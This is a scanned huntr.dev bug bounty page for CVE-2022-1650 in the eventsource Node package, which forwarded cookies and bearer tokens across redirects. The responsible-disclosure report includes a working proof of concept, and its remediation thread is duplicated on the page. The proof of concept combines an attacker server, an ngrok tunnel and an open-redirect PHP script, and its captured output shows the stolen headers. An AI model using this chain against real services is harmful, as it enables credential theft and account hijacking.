urlscan.io logo urlscan.io
SecurityTrails logo

huntr.dev Open in urlscan Pro
2600:9000:214f:bc00:14:bb32:5f00:93a1  Public Scan

Back to summary
URL: https://huntr.dev/bounties/dc9e467f-be5d-4945-867d-1044d27e9b8e/
Submission: On May 23 via api from US — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

huntr
Open menu
Bounties 124 Community More

Responsible disclosure policy

FAQ

Contact us

Hacktivity

Leaderboard

Submit report Login

Logout

huntr
Close menu

--------------------------------------------------------------------------------

Bounties
Find your next target
Disclose
Submit a vulnerability
Hacktivity
Browse public reports
Leaderboard
Our leaderboard

--------------------------------------------------------------------------------

Policy FAQ Contact us
Sign in with GitHub


EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR IN
EVENTSOURCE/EVENTSOURCE

1

Valid

Reported on

Feb 6th 2022

--------------------------------------------------------------------------------


EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR IN
EVENTSOURCE/EVENTSOURCE

> Reported on Feb 6th 2022 | Timothee Desurmont

Vulnerability type: CWE-200


BUG

Cookies & Authorisation headers are leaked to external sites.


DESCRIPTION

When fetching an url with a link to an external site (Redirect), the users
Cookies & Autorisation headers are leaked to the third party application.
According to the same-origin-policy, the header should be "sanitized".


PROOF OF CONCEPT

 1. Start a nodejs server (attacker):

    const express = require('express')
    const app = express()

    app.get('/', function (req, res) {
        console.log(req.headers);
        res.status(200).send()
    })

    app.listen(3000)

    console.log('listening on port 3000');


 2. lunch ngrok (attacker):

ngrok http 3000
Session Status                online                                                                     
Account                       Timothee Desurmont (Plan: Free)                                            
Update                        update available (version 2.3.40, Ctrl-U to update)                        
Version                       2.3.35                                                                     
Region                        United States (us)                                                         
Web Interface                 http://127.0.0.1:4040                                                      
Forwarding                    http://cb45-92-98-215-185.ngrok.io -> http://localhost:3000                
Forwarding                    https://cb45-92-98-215-185.ngrok.io -> http://localhost:3000               
                                                                                                         
Connections                   ttl     opn     rt1     rt5     p50     p90                                
                              1       0       0.00    0.00    8.92    8.92                               
                                                                                                         
HTTP Requests                                                                                            
-------------                                                                                            
                                                                                                         
GET /                          200 OK  


 3. Add a redirect.php file in \var\www\html (mysite)

    $redirect_url = $_GET['url'];
    header("Location: " . $redirect_url);


 4. Run below code (mysite)

    const EventSource = require("eventsource")

    const mysite = "http://192.168.2.31";
    const attacker = "http://cb45-92-98-215-185.ngrok.io";

    const options = {
        method: 'GET',
        headers: {
            'Content-Type': 'application/json'
            ,'Cookie': 'ajs_anonymous_id=1234567890"',
            "Authorization": "Bearer eyJhb12345abcdef"
        }
    };

    var es = new EventSource(`${mysite}//redirect.php?url=${attacker}/`, options);

    es.onerror = function (err) {
        if (err) {
        if (err.status === 401 || err.status === 403) {
            console.log('not authorized');
        }
        }
    };


 5. Responce recived by the attacker

[nodemon] starting `node server.js`
listening on port 3000
{
    host: 'cb45-92-98-215-185.ngrok.io',
    accept: 'text/event-stream',
    authorization: 'Bearer eyJhb12345abcdef',
    'cache-control': 'no-cache',
    'content-type': 'application/json',
    cookie: 'ajs_anonymous_id=1234567890"',
    'x-forwarded-for': '92.98.215.185',
    'x-forwarded-proto': 'http',
    'accept-encoding': 'gzip' 
}



CONSEQUENCE

Access Control: Hijack of victims account.

The attacker can steal the user's credentials and then use these credentials to
access the legitimate web site.


SUGGESTED FIX

If the redirected url is different from the url domain, the Authentication &
Cookies should be removed from the header.


OCCURRENCES

eventsource.js L32-L311

We are processing your report and will contact the eventsource team within 24
hours. 4 months ago
Timothee Desurmont modified the report
4 months ago
Timothee Desurmont modified the report
4 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4
months ago
Timothee Desurmont Timothee
commented 23 days ago

Researcher

--------------------------------------------------------------------------------

Hi @Admin, any update on above report?

Jamie Slome
commented 22 days ago

Admin

--------------------------------------------------------------------------------

I've dropped a comment on the GitHub Issue here. Fingers crossed we get a
response soon! 🤞

Espen Hovlandsdal validated this vulnerability 13 days ago

Thanks for reporting - I have a pull request with a fix awaiting review from the
other maintainers: https://github.com/EventSource/eventsource/pull/271

Timothee Desurmont has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Timothee Desurmont Timothee
commented 13 days ago

Researcher

--------------------------------------------------------------------------------

Hi Epson, thanks for validating the report. I am glad to hear that you already
have a fix. If needed I can also submit a PR to patch the code (just let me know
by dropping a message below) 😊

Timothee Desurmont submitted a
patch
13 days ago
Timothee Desurmont Timothee
commented 13 days ago

Researcher

--------------------------------------------------------------------------------

submitted the patch just in case...

Espen Hovlandsdal confirmed that a fix has been merged on 10ee0c 11 days ago
Espen Hovlandsdal has been awarded the fix bounty
eventsource.js#L32-L311 has been validated
Matan Borenkraout Matan
commented 7 days ago

--------------------------------------------------------------------------------

I think that this one is also fixed in version 1.1.1 based on this commit. Am I
mistaken here? Thanks!

Espen Hovlandsdal Espen
commented 3 days ago

Maintainer

--------------------------------------------------------------------------------

You are correct, yes.

Sign in to join this conversation
CVE ID

CVE-2022-1650 (published)
Vulnerability Type
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Severity
High (8.1)
Visibility
Public
Status
Fixed

Found by

Timothee Desurmont
@sampaguitas
unranked


Fixed by

Espen Hovlandsdal
@rexxars
maintainer

This report was seen 445 times.
We are processing your report and will contact the eventsource team within 24
hours. 4 months ago
Timothee Desurmont modified the report
4 months ago
Timothee Desurmont modified the report
4 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4
months ago
Timothee Desurmont Timothee
commented 23 days ago

Researcher

--------------------------------------------------------------------------------

Hi @Admin, any update on above report?

Jamie Slome
commented 22 days ago

Admin

--------------------------------------------------------------------------------

I've dropped a comment on the GitHub Issue here. Fingers crossed we get a
response soon! 🤞

Espen Hovlandsdal validated this vulnerability 13 days ago

Thanks for reporting - I have a pull request with a fix awaiting review from the
other maintainers: https://github.com/EventSource/eventsource/pull/271

Timothee Desurmont has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Timothee Desurmont Timothee
commented 13 days ago

Researcher

--------------------------------------------------------------------------------

Hi Epson, thanks for validating the report. I am glad to hear that you already
have a fix. If needed I can also submit a PR to patch the code (just let me know
by dropping a message below) 😊

Timothee Desurmont submitted a
patch
13 days ago
Timothee Desurmont Timothee
commented 13 days ago

Researcher

--------------------------------------------------------------------------------

submitted the patch just in case...

Espen Hovlandsdal confirmed that a fix has been merged on 10ee0c 11 days ago
Espen Hovlandsdal has been awarded the fix bounty
eventsource.js#L32-L311 has been validated
Matan Borenkraout Matan
commented 7 days ago

--------------------------------------------------------------------------------

I think that this one is also fixed in version 1.1.1 based on this commit. Am I
mistaken here? Thanks!

Espen Hovlandsdal Espen
commented 3 days ago

Maintainer

--------------------------------------------------------------------------------

You are correct, yes.

Sign in to join this conversation

2022 © 418sec




HUNTR

 * home
 * hacktivity
 * leaderboard
 * FAQ
 * contact us
 * terms
 * privacy policy


PART OF 418SEC

 * company
 * about
 * team


Chat with us